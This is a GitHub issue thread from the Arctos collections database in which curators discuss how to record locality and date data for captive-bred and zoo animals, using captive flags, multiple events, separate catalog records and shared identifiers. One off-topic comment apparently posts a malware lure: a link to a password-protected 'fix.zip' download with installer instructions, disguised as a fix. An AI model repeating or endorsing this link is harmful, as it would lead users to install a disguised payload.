### ISSUE TITLE
Recommendations for how to handle place and time data for captive bred organisms.

### ISSUE THREAD

**Issue by falco-rk** [ArctosDB/arctos#8041]
How do you handle place and time fields, mostly geography and spacial data fields, for captive bred individuals? Other than putting the "collecting source" as captive. In searching data on Arctos, different collections do various things. I have found that that we do it a bunch of different ways within our data and that is terrible. The documentation I have been able to find is lacking in specifics.

@happiah-madson

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ewommack** [comment]
One thing we think about is what research was conducted. If the animal came from captivity, but then was re-introduced, we'll add info in the remarks field and keep the wild locality where it was collected as the final full locality. If an animal was taken from the wild into a captive setting, there is the verbatim preservation date attribute to record the original wild locality and date the animal came from as the locality and time, but then record that it lived in captivity for a time. 

I think we'll all do it a little differently, but maybe a discussion would be a good way to sit down and see if all of us dealing with captive individuals can figure out some ideas that we can recommend for a wide variety of organisms?

Another thing to think about is if you have multiple occurrences of an animal across space and time, you could use the [Entity Collection](https://handbook.arctosdb.org/documentation/entity.html). That way the first recording is from the captive breeding facility, and it is tied together through Entities to the subsequent samplings at perhaps different places and times.

**Comment by dustymc** [comment]
If you're cataloging a pet store guppy, https://handbook.arctosdb.org/best_practices/captive.html - setting the captive flag might be enough.

If you have 'multiple occurrences of an animal across space and time' then multiple events is the solution.

(Sorta - https://arctos.database.museum/info/ctDocumentation.cfm?table=ctattribute_type#verbatim_preservation_date is a lot less work and is probably good enough when there's not much data involved, eg for short-term captives.)

There's some flexibility in how best to record multiple events - multiple events under one record are perhaps less likely to end up as independent citations and such, but also it can be awkward to attach administrative data, and just seems that people struggle with this approach. Multiple events as catalog records (what @ewommack recommends) does seem to work better (although who'd know if it's also inspiring not-great research?).

https://arctos.database.museum/info/ctDocumentation.cfm?table=ctcoll_other_id_type#organism_id is the best way to link multiple catalog records representing an individual (or other flavor of DWC:Entity); https://arctos.database.museum/collection/Arctos:Entity will create good identifiers for use under that type (and provide a place to stash some metadata), but any good identifier can serve the same purpose.

**Comment by dustymc** [comment]
I started https://handbook.arctosdb.org/best_practices/multiple_occurrence.html, someone fill in the blanks!

**Comment by campmlc** [comment]
At MSB we have tried all options, and we have gone away from using multiple events for zoo animals or captive breeding programs. The challenge with using multiple events in this case is that a single record can only accommodate one accession, and typically we receive multiple accessions over the lifetime of an animal. In addition to different events for each accession, there are different parts collected on different dates. We frequently have to loan out samples from an individual from a specific accession and date, but to track this, we have to use remarks in event and part fields, and the process becomes a data entry and data management nightmare.

Instead, we now are back to cataloging every accession/event as a separate catalog record. We use a common identifier e.g. studbook or Zoo Local ID or GAN number to link and find all samples from a single individuals. These shared identifiers can be used to create Entities, but even without an entity, all records can still be tracked. This is why identifiers are so critically important. This process allows us to use our standard workflow for captive and mark/recapture animals, with each given n accession and no special permissions and elaborate data management requirements.  We also use "encounter" in the event to indicate when we are receiving blood or serum samples from a living animal, and "collection" when the animal dies and the carcass is deposited per the repository agreement.

**Comment by campmlc** [comment]
@AdrienneRaniszewski @jldunnum 
We should have an open discussion about this for anyone interested- it is especially relevant as Arctos adds more and more collections that are partnering with zoos.

**Comment by jldunnum** [comment]
Yes, needs discussion, unfortunately I don't think we have the right model yet either

**Comment by ewommack** [comment]
Not sure if this is a concern for inverts and aquarium plants and animals, but I tend to default to the lab/breeding facilities preferred locality for their locality displayed in Arctos. Sometimes listing the exact locality of where animals are being bred publicly isn't the best scenario, so I ask the facility what they are comfortable with having shared.

**Comment by campmlc** [comment]
In most of these cases for OGL, multiple events would be ideal. Add an event for the wild source; add another event for the lab, share events among records from same wild or lab source etc.  We used to have "experimental" as an attribute for the Rausch parasites - he did a lot of similar crosses etc between wild caught and lab reared individuals, as well as hybrids. You could also have a single "public" event or locality with the others having some level of restrictions.

Mariel Campbell   (she/her)
Collection Manager, Division of Genomic Resources
Museum of Southwestern  Biology

Shipping Address:
Museum of Southwestern Biology
Division of Genomic Resources
1 University of New Mexico
MSC03 2020
Albuquerque, NM 87131

(505) 277-7808 office
email: ***@***.***


________________________________

**Comment by dustymc** [comment]
There's a place for documentation, it references this Issue, I don't think we can do more at this time, tentatively closing.
